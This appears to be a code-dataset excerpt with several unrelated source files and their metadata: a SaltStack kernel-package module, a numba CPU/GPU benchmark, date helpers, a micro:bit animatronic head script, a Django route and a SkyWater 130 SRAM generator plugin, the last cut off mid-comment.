has been installed and the system has not yet been rebooted.
The :py:func:`~salt.modules.kernelpkg_linux_apt.needs_reboot` function
exists to detect this condition.
"""
pkgs = list_installed()
if pkgs:
return pkgs[-1]
return None
def needs_reboot():
"""
Detect if a new kernel version has been installed but is not running.
Returns True if a new kernel is installed, False otherwise.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.needs_reboot
"""
return _LooseVersion(active()) < _LooseVersion(latest_installed())
def upgrade(reboot=False, at_time=None):
"""
Upgrade the kernel and optionally reboot the system.
reboot : False
Request a reboot if a new kernel is available.
at_time : immediate
Schedule the reboot at some point in the future. This argument
is ignored if ``reboot=False``. See
:py:func:`~salt.modules.system.reboot` for more details
on this argument.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.upgrade
salt '*' kernelpkg.upgrade reboot=True at_time=1
.. note::
An immediate reboot often shuts down the system before the minion has a
chance to return, resulting in errors. A minimal delay (1 minute) is
useful to ensure the result is delivered to the master.
"""
result = __salt__["pkg.install"](
name="{}-{}".format(_package_prefix(), latest_available())
)
_needs_reboot = needs_reboot()
ret = {
"upgrades": result,
"active": active(),
"latest_installed": latest_installed(),
"reboot_requested": reboot,
"reboot_required": _needs_reboot,
}
if reboot and _needs_reboot:
log.warning("Rebooting system due to kernel upgrade")
__salt__["system.reboot"](at_time=at_time)
return ret
def upgrade_available():
"""
Detect if a new kernel version is available in the repositories.
Returns True if a new kernel is available, False otherwise.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.upgrade_available
"""
return _LooseVersion(latest_available()) > _LooseVersion(latest_installed())
def remove(release):
"""
Remove a specific version of the kernel.
release
The release number of an installed kernel. This must be the entire release
number as returned by :py:func:`~salt.modules.kernelpkg_linux_apt.list_installed`,
not the package name.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.remove 4.4.0-70-generic
"""
if release not in list_installed():
raise CommandExecutionError(
"Kernel release '{}' is not installed".format(release)
)
if release == active():
raise CommandExecutionError("Active kernel cannot be removed")
target = "{}-{}".format(_package_prefix(), release)
log.info("Removing kernel package %s", target)
__salt__["pkg.purge"](target)
return {"removed": [target]}
def cleanup(keep_latest=True):
"""
Remove all unused kernel packages from the system.
keep_latest : True
In the event that the active kernel is not the latest one installed, setting this to True
will retain the latest kernel package, in addition to the active one. If False, all kernel
packages other than the active one will be removed.
CLI Example:
.. code-block:: bash
salt '*' kernelpkg.cleanup
"""
removed = []
# Loop over all installed kernel packages
for kernel in list_installed():
# Keep the active kernel package
if kernel == active():
continue
# Optionally keep the latest kernel package
if keep_latest and kernel == latest_installed():
continue
# Remove the kernel package
removed.extend(remove(kernel)["removed"])
return {"removed": removed}
def _package_prefix():
"""
Return static string for the package prefix
"""
return "linux-image"
def _kernel_type():
"""
Parse the kernel name and return its type
"""
return re.match(r"^[\d.-]+-(.+)$", active()).group(1)
def _cmp_version(item1, item2):
"""
Compare function for package version sorting
"""
vers1 = _LooseVersion(item1)
vers2 = _LooseVersion(item2)
if vers1 < vers2:
return -1
if vers1 > vers2:
return 1
return 0
| en | 0.687914 | Manage Linux kernel packages on APT-based systems Load this module on Debian-based systems only Return the version of the running kernel. CLI Example: .. code-block:: bash salt '*' kernelpkg.active Return a list of all installed kernels. CLI Example: .. code-block:: bash salt '*' kernelpkg.list_installed Return the version of the latest kernel from the package repositories. CLI Example: .. code-block:: bash salt '*' kernelpkg.latest_available Return the version of the latest installed kernel. CLI Example: .. code-block:: bash salt '*' kernelpkg.latest_installed .. note:: This function may not return the same value as :py:func:`~salt.modules.kernelpkg_linux_apt.active` if a new kernel has been installed and the system has not yet been rebooted. The :py:func:`~salt.modules.kernelpkg_linux_apt.needs_reboot` function exists to detect this condition. Detect if a new kernel version has been installed but is not running. Returns True if a new kernel is installed, False otherwise. CLI Example: .. code-block:: bash salt '*' kernelpkg.needs_reboot Upgrade the kernel and optionally reboot the system. reboot : False Request a reboot if a new kernel is available. at_time : immediate Schedule the reboot at some point in the future. This argument is ignored if ``reboot=False``. See :py:func:`~salt.modules.system.reboot` for more details on this argument. CLI Example: .. code-block:: bash salt '*' kernelpkg.upgrade salt '*' kernelpkg.upgrade reboot=True at_time=1 .. note:: An immediate reboot often shuts down the system before the minion has a chance to return, resulting in errors. A minimal delay (1 minute) is useful to ensure the result is delivered to the master. Detect if a new kernel version is available in the repositories. Returns True if a new kernel is available, False otherwise. CLI Example: .. code-block:: bash salt '*' kernelpkg.upgrade_available Remove a specific version of the kernel. release The release number of an installed kernel. This must be the entire release number as returned by :py:func:`~salt.modules.kernelpkg_linux_apt.list_installed`, not the package name. CLI Example: .. code-block:: bash salt '*' kernelpkg.remove 4.4.0-70-generic Remove all unused kernel packages from the system. keep_latest : True In the event that the active kernel is not the latest one installed, setting this to True will retain the latest kernel package, in addition to the active one. If False, all kernel packages other than the active one will be removed. CLI Example: .. code-block:: bash salt '*' kernelpkg.cleanup # Loop over all installed kernel packages # Keep the active kernel package # Optionally keep the latest kernel package # Remove the kernel package Return static string for the package prefix Parse the kernel name and return its type Compare function for package version sorting | 2.42308 | 2 |
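list_installed() above strips the linux-image- prefix and sorts the remaining release strings with functools.cmp_to_key(_cmp_version), so numeric fields win over plain string order. Below is a stand-alone sketch of that ordering; the release strings are made up, and the simple field parser only approximates what salt's LooseVersion does for strings of this shape.
import functools
import re

def cmp_release(a, b):
    # Returns -1/0/1 like _cmp_version above, comparing numeric fields as ints.
    def fields(release):
        return [int(p) if p.isdigit() else p for p in re.split(r"[.-]", release)]
    fa, fb = fields(a), fields(b)
    return (fa > fb) - (fa < fb)

releases = ["4.4.0-101-generic", "4.4.0-9-generic", "4.4.0-97-generic"]
print(sorted(releases))                                         # plain string sort puts 101 before 97
print(sorted(releases, key=functools.cmp_to_key(cmp_release)))  # 9 < 97 < 101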
main.py | david-slatinek/running-a-program-on-the-CPU-vs.-on-the-GPU | 0 | 8078 | <gh_stars>0
import json
import numpy as np
from numba import jit
from timeit import default_timer as timer
# Constant, used in the formula.
# Defined here to speed up the calculation, i.e. it's calculated only once
# and then placed in the formula.
SQRT_2PI = np.float32(np.sqrt(2 * np.pi))
# This function will run on the CPU.
def gaussian_cpu(values, mean, sigma):
"""Calculate values of the Gaussian function.
:param values: list, function input parameters.
:param mean: float, arithmetic mean.
:param sigma: float, standard deviation.
:return: list.
"""
result = np.zeros_like(values)
for index, item in enumerate(values):
result[index] = (1 / (sigma * SQRT_2PI)) * (np.e ** (-0.5 * ((item - mean) / sigma) ** 2))
return result
# This function will run on the GPU.
gaussian_gpu = jit(gaussian_cpu)
def write_to_file(name, values):
"""Write results to a file.
:param name: string, file name, only prefix.
:param values: dictionary, values to write.
"""
with open(name + ".json", 'w') as f:
json.dump(values, f, indent=4)
if __name__ == "__main__":
# Randomly generated values.
x = np.random.uniform(-3, 3, size=1000000).astype(np.float32)
# Randomly generated mean.
m = np.random.uniform(1, 10)
# Randomly generated standard deviation.
s = np.random.uniform(1, 10)
# The number of rounds.
n = 1
# Used to store execution time.
time_results = {}
for i in range(n):
start = timer()
gaussian_cpu(x, m, s)
end = timer() - start
time_results[i] = end
write_to_file("cpu", time_results)
for i in range(n):
start = timer()
gaussian_gpu(x, m, s)
end = timer() - start
time_results[i] = end
write_to_file("gpu", time_results)
| import json
import numpy as np
from numba import jit
from timeit import default_timer as timer
# Constant, used in the formula.
# Defined here to speed up the calculation, i.e. it's calculated only once
# and then placed in the formula.
SQRT_2PI = np.float32(np.sqrt(2 * np.pi))
# This function will run on the CPU.
def gaussian_cpu(values, mean, sigma):
"""Calculate values of the Gaussian function.
:param values: list, function input parameters.
:param mean: float, arithmetic mean.
:param sigma: float, standard deviation.
:return: list.
"""
result = np.zeros_like(values)
for index, item in enumerate(values):
result[index] = (1 / (sigma * SQRT_2PI)) * (np.e ** (-0.5 * ((item - mean) / sigma) ** 2))
return result
# This function will run on the GPU.
gaussian_gpu = jit(gaussian_cpu)
def write_to_file(name, values):
"""Write results to a file.
:param name: string, file name, only prefix.
:param values: dictionary, values to write.
"""
with open(name + ".json", 'w') as f:
json.dump(values, f, indent=4)
if __name__ == "__main__":
# Randomly generated values.
x = np.random.uniform(-3, 3, size=1000000).astype(np.float32)
# Randomly generated mean.
m = np.random.uniform(1, 10)
# Randomly generated standard deviation.
s = np.random.uniform(1, 10)
# The number of rounds.
n = 1
# Used to store execution time.
time_results = {}
for i in range(n):
start = timer()
gaussian_cpu(x, m, s)
end = timer() - start
time_results[i] = end
write_to_file("cpu", time_results)
for i in range(n):
start = timer()
gaussian_gpu(x, m, s)
end = timer() - start
time_results[i] = end
write_to_file("gpu", time_results) | en | 0.742629 | # Constant, used in the formula. # Defined here to speed up the calculation, i.e. it's calculated only once # and then placed in the formula. # This function will run on the CPU. Calculate values of the Gaussian function. :param values: list, function input parameters. :param mean: float, arithmetic mean. :param sigma: float, standard deviation. :return: list. # This function will run on the GPU. Write results to a file. :param name: string, file name, only prefix. :param values: dictionary, values to write. # Randomly generated values. # Randomly generated mean. # Randomly generated standard deviation. # The number of rounds. # Used to store execution time. | 3.121527 | 3 |
src/jj_analyzer/__init__.py | ninetymiles/jj-logcat-analyzer | 0 | 8079 | #! /usr/bin/python
import sys
if sys.version_info[0] == 3:
from .__main__ import *
else:
pass | #! /usr/bin/python
import sys
if sys.version_info[0] == 3:
from .__main__ import *
else:
pass | fr | 0.245098 | #! /usr/bin/python | 1.264367 | 1 |
utility_functions.py | Team-501-The-PowerKnights/Powerknights-Slack-Bot | 1 | 8080 | import datetime
def iso_extract_info(string):
"""
Will get all of the info and return it as an array
:param string: ISO formatted string that will be used for extraction
:return: array [year, month, day, military_time_hour, minutes, hours]
:note: every item is an int except for minutes
    :note: hours is only set when military_time_hour is greater than 12
"""
elements = []
characters = list(string)
year_int = int("".join(characters[0:4]))
month_int = int("".join(characters[5:7]))
day_int = int("".join(characters[8:10]))
military_time_hours_int = int("".join(characters[11:13]))
minutes_int = "".join(characters[14:16])
hours = 0
elements.append(year_int)
elements.append(month_int)
elements.append(day_int)
elements.append(minutes_int)
if military_time_hours_int > 12:
hours += military_time_hours_int - 12
elements.append(hours)
return elements
# # Testing:
# print("[year, month, day, military_time_hour, minutes, hours]")
# print(iso_extract_info('2019-04-27T16:00:00-04:00'))
# Doesn't use the "iso_extract_info" function
def iso_format_to_regular(string):
"""
Will take a string that is an iso formatted string and make it look readable
:param string: the iso formatted string
:return: str
"""
characters = list(string)
year_int = int("".join(characters[0:4]))
month_int = int("".join(characters[5:7]))
day_int = int("".join(characters[8:10]))
military_time_hours_int = int("".join(characters[11:13]))
minutes_int = "".join(characters[14:16])
if military_time_hours_int > 12:
hours = military_time_hours_int - 12
final_string = "{month}/{day}/{year} {hour}:{minute}PM".format(
month=month_int, day=day_int, year=year_int, hour=hours, minute=minutes_int)
return final_string
else:
final_string = "{month}/{day}/{year} {hour}:{minute}AM".format(
month=month_int, day=day_int, year=year_int, hour=military_time_hours_int, minute=minutes_int)
return final_string
# Testing:
# print(iso_format_to_regular('2019-04-27T16:00:00-04:00'))
# Doesn't use the "iso_extract_info" function
def fix_time(strange_date):
"""
    Will rearrange the strange date that Google gives and replace it with the normal string.
:param strange_date: strange time that google gives when an event is marked as "all day"
:return: str
"""
items = strange_date.split("-")
year_int = int(items[0])
month_int = int(items[1])
day_int = int(items[2])
new_str = "{month}/{day}/{year}".format(
month=month_int, day=day_int, year=year_int)
return new_str
# Doesn't use the "iso_extract_info" function
def multiday_checker_STRANGE(start_date, end_date):
"""
    Will check if an event is more than a day long
:param start_date: Strange Google formatted date of the start of the event
:param end_date: Strange Google formatted date of the end of the event
:return: Boolean
"""
start_date_items = start_date.split("-")
end_date_items = end_date.split("-")
start_date_sum = 0
end_date_sum = 0
for string in start_date_items:
number = int(string)
start_date_sum += number
for string in end_date_items:
number = int(string)
end_date_sum += number
date_dif = start_date_sum - end_date_sum
if date_dif > 2:
return True
else:
return False
# Testing:
# print(multiday_checker_STRANGE('2019-04-21', '2019-04-22'))
# Doesn't use the "iso_extract_info" function
def STRANGE_string_weekday(string):
"""
Will take a string that is a date formatted in the Google format and find what day of the week it is
:param string: Google formatted string for the date
:return: string
"""
items = string.split("/")
year_int = int(items[2])
month_int = int(items[0])
day_int = int(items[1])
datetime_instance = datetime.date(year_int, month_int, day_int)
week_day_number = datetime_instance.weekday()
if week_day_number == 0:
return "Monday"
elif week_day_number == 1:
return "Tuesday"
elif week_day_number == 2:
return "Wendsday"
elif week_day_number == 3:
return "Thursday"
elif week_day_number == 4:
return "Friday"
elif week_day_number == 5:
return "Saturday"
elif week_day_number == 6:
return "Sunday"
else:
return "Error"
# Testing:
# print(STRANGE_string_weekday("2019-04-27"))
# Doesn't use the "iso_extract_info" function
def ISO_string_weekday(string):
"""
Will take a string that is a date formatted in the ISO format and find what day of the week it is
:param string: ISO formatted string for the date
:return: string
"""
characters = list(string)
year_int = int("".join(characters[0:4]))
month_int = int("".join(characters[5:7]))
day_int = int("".join(characters[8:10]))
datetime_instance = datetime.date(year_int, month_int, day_int)
week_day_number = datetime_instance.weekday()
if week_day_number == 0:
return "Monday"
elif week_day_number == 1:
return "Tuesday"
elif week_day_number == 2:
return "Wendsday"
elif week_day_number == 3:
return "Thursday"
elif week_day_number == 4:
return "Friday"
elif week_day_number == 5:
return "Saturday"
elif week_day_number == 6:
return "Sunday"
else:
return "Error"
# Testing:
# print(ISO_string_weekday('2019-06-28T16:00:00-04:00'))
| import datetime
def iso_extract_info(string):
"""
Will get all of the info and return it as an array
:param string: ISO formatted string that will be used for extraction
:return: array [year, month, day, military_time_hour, minutes, hours]
:note: every item is an int except for minutes
    :note: hours is only set when military_time_hour is greater than 12
"""
elements = []
characters = list(string)
year_int = int("".join(characters[0:4]))
month_int = int("".join(characters[5:7]))
day_int = int("".join(characters[8:10]))
military_time_hours_int = int("".join(characters[11:13]))
minutes_int = "".join(characters[14:16])
hours = 0
elements.append(year_int)
elements.append(month_int)
elements.append(day_int)
elements.append(minutes_int)
if military_time_hours_int > 12:
hours += military_time_hours_int - 12
elements.append(hours)
return elements
# # Testing:
# print("[year, month, day, military_time_hour, minutes, hours]")
# print(iso_extract_info('2019-04-27T16:00:00-04:00'))
# Doesn't use the "iso_extract_info" function
def iso_format_to_regular(string):
"""
Will take a string that is an iso formatted string and make it look readable
:param string: the iso formatted string
:return: str
"""
characters = list(string)
year_int = int("".join(characters[0:4]))
month_int = int("".join(characters[5:7]))
day_int = int("".join(characters[8:10]))
military_time_hours_int = int("".join(characters[11:13]))
minutes_int = "".join(characters[14:16])
if military_time_hours_int > 12:
hours = military_time_hours_int - 12
final_string = "{month}/{day}/{year} {hour}:{minute}PM".format(
month=month_int, day=day_int, year=year_int, hour=hours, minute=minutes_int)
return final_string
else:
final_string = "{month}/{day}/{year} {hour}:{minute}AM".format(
month=month_int, day=day_int, year=year_int, hour=military_time_hours_int, minute=minutes_int)
return final_string
# Testing:
# print(iso_format_to_regular('2019-04-27T16:00:00-04:00'))
# Doesn't use the "iso_extract_info" function
def fix_time(strange_date):
"""
    Will rearrange the strange date that Google gives and replace it with the normal string.
:param strange_date: strange time that google gives when an event is marked as "all day"
:return: str
"""
items = strange_date.split("-")
year_int = int(items[0])
month_int = int(items[1])
day_int = int(items[2])
new_str = "{month}/{day}/{year}".format(
month=month_int, day=day_int, year=year_int)
return new_str
# Doesn't use the "iso_extract_info" function
def multiday_checker_STRANGE(start_date, end_date):
"""
    Will check if an event is more than a day long
:param start_date: Strange Google formatted date of the start of the event
:param end_date: Strange Google formatted date of the end of the event
:return: Boolean
"""
start_date_items = start_date.split("-")
end_date_items = end_date.split("-")
start_date_sum = 0
end_date_sum = 0
for string in start_date_items:
number = int(string)
start_date_sum += number
for string in end_date_items:
number = int(string)
end_date_sum += number
date_dif = start_date_sum - end_date_sum
if date_dif > 2:
return True
else:
return False
# Testing:
# print(multiday_checker_STRANGE('2019-04-21', '2019-04-22'))
# Doesn't use the "iso_extract_info" function
def STRANGE_string_weekday(string):
"""
Will take a string that is a date formatted in the Google format and find what day of the week it is
:param string: Google formatted string for the date
:return: string
"""
items = string.split("/")
year_int = int(items[2])
month_int = int(items[0])
day_int = int(items[1])
datetime_instance = datetime.date(year_int, month_int, day_int)
week_day_number = datetime_instance.weekday()
if week_day_number == 0:
return "Monday"
elif week_day_number == 1:
return "Tuesday"
elif week_day_number == 2:
return "Wendsday"
elif week_day_number == 3:
return "Thursday"
elif week_day_number == 4:
return "Friday"
elif week_day_number == 5:
return "Saturday"
elif week_day_number == 6:
return "Sunday"
else:
return "Error"
# Testing:
# print(STRANGE_string_weekday("2019-04-27"))
# Doesn't use the "iso_extract_info" function
def ISO_string_weekday(string):
"""
Will take a string that is a date formatted in the ISO format and find what day of the week it is
:param string: ISO formatted string for the date
:return: string
"""
characters = list(string)
year_int = int("".join(characters[0:4]))
month_int = int("".join(characters[5:7]))
day_int = int("".join(characters[8:10]))
datetime_instance = datetime.date(year_int, month_int, day_int)
week_day_number = datetime_instance.weekday()
if week_day_number == 0:
return "Monday"
elif week_day_number == 1:
return "Tuesday"
elif week_day_number == 2:
return "Wendsday"
elif week_day_number == 3:
return "Thursday"
elif week_day_number == 4:
return "Friday"
elif week_day_number == 5:
return "Saturday"
elif week_day_number == 6:
return "Sunday"
else:
return "Error"
# Testing:
# print(ISO_string_weekday('2019-06-28T16:00:00-04:00'))
| en | 0.687177 | Will get all of the info and return it as an array :param string: ISO formatted string that will be used for extraction :return: array [year, month, day, military_time_hour, minutes, hours] :note: every item is an int except for minutes :note: hours only is there is military_time_hour is greater than 12 # # Testing: # print("[year, month, day, military_time_hour, minutes, hours]") # print(iso_extract_info('2019-04-27T16:00:00-04:00')) # Doesn't use the "iso_extract_info" function Will take a string that is an iso formatted string and make it look readable :param string: the iso formatted string :return: str # Testing: # print(iso_format_to_regular('2019-04-27T16:00:00-04:00')) # Doesn't use the "iso_extract_info" function Will rearrange the strange date that Google gives and repalce it with the normal string. :param strange_date: strange time that google gives when an event is marked as "all day" :return: str # Doesn't use the "iso_extract_info" function Will check if an event is more than day long :param start_date: Strange Google formatted date of the start of the event :param end_date: Strange Google formatted date of the end of the event :return: Boolean # Testing: # print(multiday_checker_STRANGE('2019-04-21', '2019-04-22')) # Doesn't use the "iso_extract_info" function Will take a string that is a date formatted in the Google format and find what day of the week it is :param string: Google formatted string for the date :return: string # Testing: # print(STRANGE_string_weekday("2019-04-27")) # Doesn't use the "iso_extract_info" function Will take a string that is a date formatted in the ISO format and find what day of the week it is :param string: ISO formatted string for the date :return: string # Testing: # print(ISO_string_weekday('2019-06-28T16:00:00-04:00')) | 4.180344 | 4 |
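The helpers above pull fields out of ISO-8601 strings by fixed character positions. The standard library can do the same job with less slicing; the sketch below is an equivalent of iso_format_to_regular built on datetime.fromisoformat (Python 3.7+), keeping the original's 12-hour formatting, including its treatment of hours up to and including 12 as AM.
from datetime import datetime

def iso_format_to_regular_dt(iso_string):
    # "2019-04-27T16:00:00-04:00" -> "4/27/2019 4:00PM"
    dt = datetime.fromisoformat(iso_string)
    if dt.hour > 12:
        return f"{dt.month}/{dt.day}/{dt.year} {dt.hour - 12}:{dt.minute:02d}PM"
    return f"{dt.month}/{dt.day}/{dt.year} {dt.hour}:{dt.minute:02d}AM"

print(iso_format_to_regular_dt("2019-04-27T16:00:00-04:00"))  # 4/27/2019 4:00PM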
python/ch_06_Animatronic_Head.py | tallamjr/mbms | 18 | 8081 | <gh_stars>10-100
from microbit import *
import random, speech, radio
eye_angles = [50, 140, 60, 90, 140]
radio.off()
sentences = [
"Hello my name is Mike",
"What is your name",
"I am looking at you",
"Exterminate exterminate exterminate",
"Number Five is alive",
"I cant do that Dave",
"daisee daisee give me your answer do"
]
lips0 = Image("00000:"
"00000:"
"99999:"
"00000:"
"00000")
lips1 = Image("00000:"
"00900:"
"99099:"
"00900:"
"00000")
lips2 = Image("00000:"
"09990:"
"99099:"
"09990:"
"00000")
lips = [lips0, lips1, lips2]
def set_servo_angle(pin, angle):
duty = 26 + (angle * 51) / 90
pin.write_analog(duty)
def speak(sentence):
words = sentence.split()
for i in range(0, len(words)):
display.show(random.choice(lips))
speech.say(words[i])
display.show(lips0)
def act():
set_servo_angle(pin2, random.choice(eye_angles))
sleep(300)
speak(random.choice(sentences))
set_servo_angle(pin2, 90)
base_z = 0
while True:
new_z = abs(accelerometer.get_z())
if abs(new_z - base_z) > 20:
base_z = new_z
act()
if random.randint(0, 1000) == 0: # say something 1 time in 1000
act()
sleep(200)
| from microbit import *
import random, speech, radio
eye_angles = [50, 140, 60, 90, 140]
radio.off()
sentences = [
"Hello my name is Mike",
"What is your name",
"I am looking at you",
"Exterminate exterminate exterminate",
"Number Five is alive",
"I cant do that Dave",
"daisee daisee give me your answer do"
]
lips0 = Image("00000:"
"00000:"
"99999:"
"00000:"
"00000")
lips1 = Image("00000:"
"00900:"
"99099:"
"00900:"
"00000")
lips2 = Image("00000:"
"09990:"
"99099:"
"09990:"
"00000")
lips = [lips0, lips1, lips2]
def set_servo_angle(pin, angle):
duty = 26 + (angle * 51) / 90
pin.write_analog(duty)
def speak(sentence):
words = sentence.split()
for i in range(0, len(words)):
display.show(random.choice(lips))
speech.say(words[i])
display.show(lips0)
def act():
set_servo_angle(pin2, random.choice(eye_angles))
sleep(300)
speak(random.choice(sentences))
set_servo_angle(pin2, 90)
base_z = 0
while True:
new_z = abs(accelerometer.get_z())
if abs(new_z - base_z) > 20:
base_z = new_z
act()
if random.randint(0, 1000) == 0: # say something 1 time in 1000
act()
sleep(200) | en | 0.845864 | # say something 1 time in 1000 | 3.224124 | 3 |
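set_servo_angle above maps an angle onto the micro:bit's 0-1023 analog duty range with duty = 26 + angle * 51 / 90, i.e. roughly 26 at 0 degrees and 128 at 180 degrees. The sketch below just evaluates that mapping for the distinct angles in eye_angles and converts each duty value to an approximate pulse width assuming a 20 ms PWM period; the period is an assumption here, since the script does not set it explicitly.
def servo_duty(angle):
    # Same formula as set_servo_angle above (write_analog expects 0-1023).
    return 26 + (angle * 51) / 90

for angle in [50, 60, 90, 140]:
    duty = servo_duty(angle)
    pulse_ms = duty / 1023 * 20  # assumes a 20 ms PWM period
    print(angle, round(duty, 1), round(pulse_ms, 2), "ms")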
debugtalk.py | caoyp2/HRunDemo | 0 | 8082 | <filename>debugtalk.py
import datetime
import time
def sleep(n_secs):
time.sleep(n_secs)
def get_timestamp():
dtime = datetime.datetime.now()
un_time = time.mktime(dtime.timetuple())
return str(un_time)
def print_docId(docId):
print(docId)
def print_phonepass(phone,password):
print(phone + "---------" + password)
| <filename>debugtalk.py
import datetime
import time
def sleep(n_secs):
time.sleep(n_secs)
def get_timestamp():
dtime = datetime.datetime.now()
un_time = time.mktime(dtime.timetuple())
return str(un_time)
def print_docId(docId):
print(docId)
def print_phonepass(phone,password):
print(phone + "---------" + password)
| none | 1 | 2.687747 | 3 |
|
hubcare/metrics/community_metrics/issue_template/urls.py | aleronupe/2019.1-hubcare-api | 7 | 8083 | from django.urls import path
from issue_template.views import IssueTemplateView
urlpatterns = [
path(
'<str:owner>/<str:repo>/<str:token_auth>/',
IssueTemplateView.as_view()
),
]
| from django.urls import path
from issue_template.views import IssueTemplateView
urlpatterns = [
path(
'<str:owner>/<str:repo>/<str:token_auth>/',
IssueTemplateView.as_view()
),
]
| none | 1 | 1.530356 | 2 |
|
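The route above captures owner, repo and token_auth as <str:...> path converters and passes them to IssueTemplateView as keyword arguments. The view itself lives in issue_template/views.py, which is not part of this record, so the class below is only an illustrative sketch of the call shape, not the project's actual implementation.
# Hypothetical shape of the view on the receiving end of this route.
from django.http import JsonResponse
from django.views import View

class IssueTemplateView(View):
    def get(self, request, owner, repo, token_auth):
        # The three <str:...> segments captured by the URL arrive here as kwargs.
        return JsonResponse({"owner": owner, "repo": repo, "token_auth": token_auth})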
src/hammer-vlsi/technology/sky130/sram_compiler/__init__.py | httpsgithu/hammer | 138 | 8084 | <reponame>httpsgithu/hammer
import os, tempfile, subprocess
from hammer_vlsi import MMMCCorner, MMMCCornerType, HammerTool, HammerToolStep, HammerSRAMGeneratorTool, SRAMParameters
from hammer_vlsi.units import VoltageValue, TemperatureValue
from hammer_tech import Library, ExtraLibrary
from typing import NamedTuple, Dict, Any, List
from abc import ABCMeta, abstractmethod
class SKY130SRAMGenerator(HammerSRAMGeneratorTool):
def tool_config_prefix(self) -> str:
return "sram_generator.sky130"
def version_number(self, version: str) -> int:
return 0
# Run generator for a single sram and corner
def generate_sram(self, params: SRAMParameters, corner: MMMCCorner) -> ExtraLibrary:
tech_cache_dir = os.path.abspath(self.technology.cache_dir)
#TODO: this is really an abuse of the corner stuff
if corner.type == MMMCCornerType.Setup:
speed_name = "slow"
speed = "SS"
elif corner.type == MMMCCornerType.Hold:
speed_name = "fast"
speed = "FF"
elif corner.type == MMMCCornerType.Extra:
speed_name = "typical"
speed = "TT"
# Different target memories based on port count
# if params.family == "1rw":
# self.logger.info("Compiling 1rw memories to DFFRAM instances")
# base_dir = self.get_setting("technology.sky130.dffram_lib")
# fam_code = params.family
# sram_name = "RAM{d}x{w}".format(
# d=params.depth,
# w=params.width)
# #TODO: need real libs (perhaps run Liberate here?)
# #For now, use the dummy lib for all corners
# corner_str = "" #
# lib_path = "{b}/{n}.lib".format(
# b=base_dir,
# n=sram_name)
# if not os.path.exists(lib_path):
# self.logger.error("SKY130 1rw1r SRAM cache does not support corner: {c}".format(c=corner_str))
# return ExtraLibrary(prefix=None, library=Library(
# name=sram_name,
# nldm_liberty_file=lib_path,
# lef_file="{b}/{n}/{n}.lef".format(b=base_dir,n=sram_name),
# #TODO: GDS not generated. Unclear which DEF to use?
# #gds_file="{b}/{n}/{n}.gds".format(b=base_dir,n=sram_name),
# spice_file="{b}/{n}/{n}.spice".format(b=base_dir,n=sram_name),
# #TODO: Will not work as-is for behav. sim (this is a structural netlist referencing std. cells)
# #Need to add std cell behavioral Verilog to sim.inputs.input_files
# verilog_sim="{b}/{n}/{n}.nl.v".format(b=base_dir,n=sram_name),
# corner={'nmos': speed_name, 'pmos': speed_name, 'temperature': str(corner.temp.value_in_units("C")) + " C"},
# supplies={'VDD': str(corner.voltage.value_in_units("V")) + " V", 'GND': "0 V"},
# provides=[{'lib_type': "sram", 'vt': params.vt}]))
# elif params.family == "1rw1r":
if params.family == "1rw":
self.logger.info("Compiling 1rw1r memories to OpenRAM instances")
base_dir = self.get_setting("technology.sky130.openram_lib")
fam_code = params.family
s=round(round(params.width*params.depth/8, -3)/1000) # size in kiB
w=params.width
d=params.depth
m=8
sram_name = f"sky130_sram_{s}kbyte_1rw1r_{w}x{d}_{m}"
print(f"SRAM_NAME: {sram_name}")
#TODO: Hammer SRAMParameters doesn't have this info
#TODO: replace this if OpenRAM characterization done for other corners
#For now, use typical lib for all corners
corner_str = "TT_1p8V_25C"
#corner_str = "{speed}_{volt}V_{temp}C".format(
# speed = speed,
# volt = str(corner.voltage.value_in_units("V")).replace(".","p"),
# temp = str(int(corner.temp.value_in_units("C"))).replace(".","p"))
lib_path = "{b}/{n}/{n}_{c}.lib".format(
b=base_dir,
n=sram_name,
c=corner_str)
if not os.path.exists(lib_path):
self.logger.error("SKY130 1rw1r SRAM cache does not support corner: {c}".format(c=corner_str))
return ExtraLibrary(prefix=None, library=Library(
name=sram_name,
nldm_liberty_file=lib_path,
lef_file="{b}/{n}/{n}.lef".format(b=base_dir,n=sram_name),
gds_file="{b}/{n}/{n}.gds".format(b=base_dir,n=sram_name),
spice_file="{b}/{n}/{n}.lvs.sp".format(b=base_dir,n=sram_name),
verilog_sim="{b}/{n}/{n}.v".format(b=base_dir,n=sram_name),
corner={'nmos': speed_name, 'pmos': speed_name, 'temperature': str(corner.temp.value_in_units("C")) + " C"},
supplies={'VDD': str(corner.voltage.value_in_units("V")) + " V", 'GND': "0 V"},
provides=[{'lib_type': "sram", 'vt': params.vt}]))
else:
self.logger.error("SKY130 SRAM cache does not support family:{f}".format(f=params.family))
return ExtraLibrary(prefix=None, library=None)
tool=SKY130SRAMGenerator
| import os, tempfile, subprocess
from hammer_vlsi import MMMCCorner, MMMCCornerType, HammerTool, HammerToolStep, HammerSRAMGeneratorTool, SRAMParameters
from hammer_vlsi.units import VoltageValue, TemperatureValue
from hammer_tech import Library, ExtraLibrary
from typing import NamedTuple, Dict, Any, List
from abc import ABCMeta, abstractmethod
class SKY130SRAMGenerator(HammerSRAMGeneratorTool):
def tool_config_prefix(self) -> str:
return "sram_generator.sky130"
def version_number(self, version: str) -> int:
return 0
# Run generator for a single sram and corner
def generate_sram(self, params: SRAMParameters, corner: MMMCCorner) -> ExtraLibrary:
tech_cache_dir = os.path.abspath(self.technology.cache_dir)
#TODO: this is really an abuse of the corner stuff
if corner.type == MMMCCornerType.Setup:
speed_name = "slow"
speed = "SS"
elif corner.type == MMMCCornerType.Hold:
speed_name = "fast"
speed = "FF"
elif corner.type == MMMCCornerType.Extra:
speed_name = "typical"
speed = "TT"
# Different target memories based on port count
# if params.family == "1rw":
# self.logger.info("Compiling 1rw memories to DFFRAM instances")
# base_dir = self.get_setting("technology.sky130.dffram_lib")
# fam_code = params.family
# sram_name = "RAM{d}x{w}".format(
# d=params.depth,
# w=params.width)
# #TODO: need real libs (perhaps run Liberate here?)
# #For now, use the dummy lib for all corners
# corner_str = "" #
# lib_path = "{b}/{n}.lib".format(
# b=base_dir,
# n=sram_name)
# if not os.path.exists(lib_path):
# self.logger.error("SKY130 1rw1r SRAM cache does not support corner: {c}".format(c=corner_str))
# return ExtraLibrary(prefix=None, library=Library(
# name=sram_name,
# nldm_liberty_file=lib_path,
# lef_file="{b}/{n}/{n}.lef".format(b=base_dir,n=sram_name),
# #TODO: GDS not generated. Unclear which DEF to use?
